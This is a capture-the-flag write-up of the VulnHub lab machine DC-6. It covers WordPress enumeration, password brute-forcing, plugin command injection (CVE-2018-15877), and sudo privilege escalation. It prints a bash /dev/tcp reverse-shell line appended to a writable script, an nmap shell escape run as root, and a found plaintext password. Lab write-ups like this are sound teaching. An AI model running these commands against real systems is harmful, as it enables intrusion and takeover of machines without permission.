DC-6 starts off by enumerating usernames from a WordPress website. I’m able to gain a set of credentials to log into the admin panel with a brute-force attack. There is a WP Plugin which can be leveraged to gain a foothold on the system. A to-do note containing the user’s credentials is discovered while enumerating the home directory. For the root part, there is a sudo privileges on a writable backup script and
nmap which allows me to escalate to other users then straight to root.
Host Discovery — arpscan
Because 192.168.2.1 and
192.168.2.2 are virtual gateway addresses, the target machine’s IP address is most likely
arp-scan --interface eth0 '192.168.2.0/24' | tee scans/00-arp-scan-dc6
With initial scan,
nmap shows two ports open: SSH on port 22 and Apache Web Server on port 80.
nmap -n -sC -sV -oA scans/10-initial-dc6 '192.168.2.104' -v
From the results above, there’s a redirection to
http://wordy/ on port 80. To properly resolve the web, I’ll add wordy to my
echo '192.168.1.104 wordy' >> /etc/hosts
TCP 80 — Website
This page clearly states that it’s a WordPress site.
Nothing interesting to explore here, but the text
secure plugins seems to be a hint from the machine’s author.
— :: Nmap NSE
nmap script against this website finds several usernames.
nmap -p 80 --script "http-wordpress*" wordy
I’ll save those usernames into a file called
— :: WPScan
wpscan identifies two vulnerable WP plugins: an RCE and a user role privilege escalation.
wpscan --url http://wordy/ --enumerate vp --plugins-detection aggressive --api-token your_token123
I’m interested with the RCE one, but before that I’ll have to find creds.
At that time, I was stuck for a couple of hours. Asking for a nudge and the answer was to brute force, I didn’t know that the box’s author actually gave us a hint to create a custom wordlist from
I’ll create new wordlist from
rockyou.txt and then use it to perform a brute force attack using
wpscan --url http://wordy/ --usernames users --passwords passwords.txt
It returns one valid credentials:
Plainview Activity Monitor — RCE (CVE-2018–15877)
With the credentials I obtained, I can login into WP Dashboard.
From the previous
wpscan, I searched the exploit PoC for Plainview Activity Monitor RCE and found this from exploit-db.
The exploit PoC exploits a vulnerability that comes from this IP tools feature.
I’ll hit the lookup button and intercept the request on Burp.
RCE can be achieved by adding a set of malicious OS commands after the command pipe
|, semi colon
; (stacked command), or logical OR
|| at the
ip section. In this case, I send a reverse shell.
The home directory is readable by
www-data and there are two interesting files:
I immediately checked the contents of
backups.sh script is writable by group
devs, and I’ll note that.
things-to-do.txt contains graham’s credentials.
SSH — Graham
I tried the graham’s creds,
graham:GSo7isUM1D4, on SSH, and it worked.
Shell as jens via sudo backups.sh
graham has sudo privileges on the
backups.sh script, and this allows me to run the script as user
Because the script is also writable by graham (
devs group), I can exploit this to escalate myself to
jens by adding a reverse shell line to the script and then run it with sudo.
graham@dc-6:~$ echo 'bash -i >& /dev/tcp/192.168.2.108/9000 0>&1' >> /home/jens/backups.sh
Shell as root via sudo nmap
I found out that user
jens is allowed to execute
nmap as root user.
I can also exploit this using reference from GTFObins.
jens@dc-6:/home/graham$ echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:/home/graham$ sudo nmap --script=$TF
And here is the flag:
Originally published at: https://fahmifj.github.io/writeups/vulnhub/vh-dc6/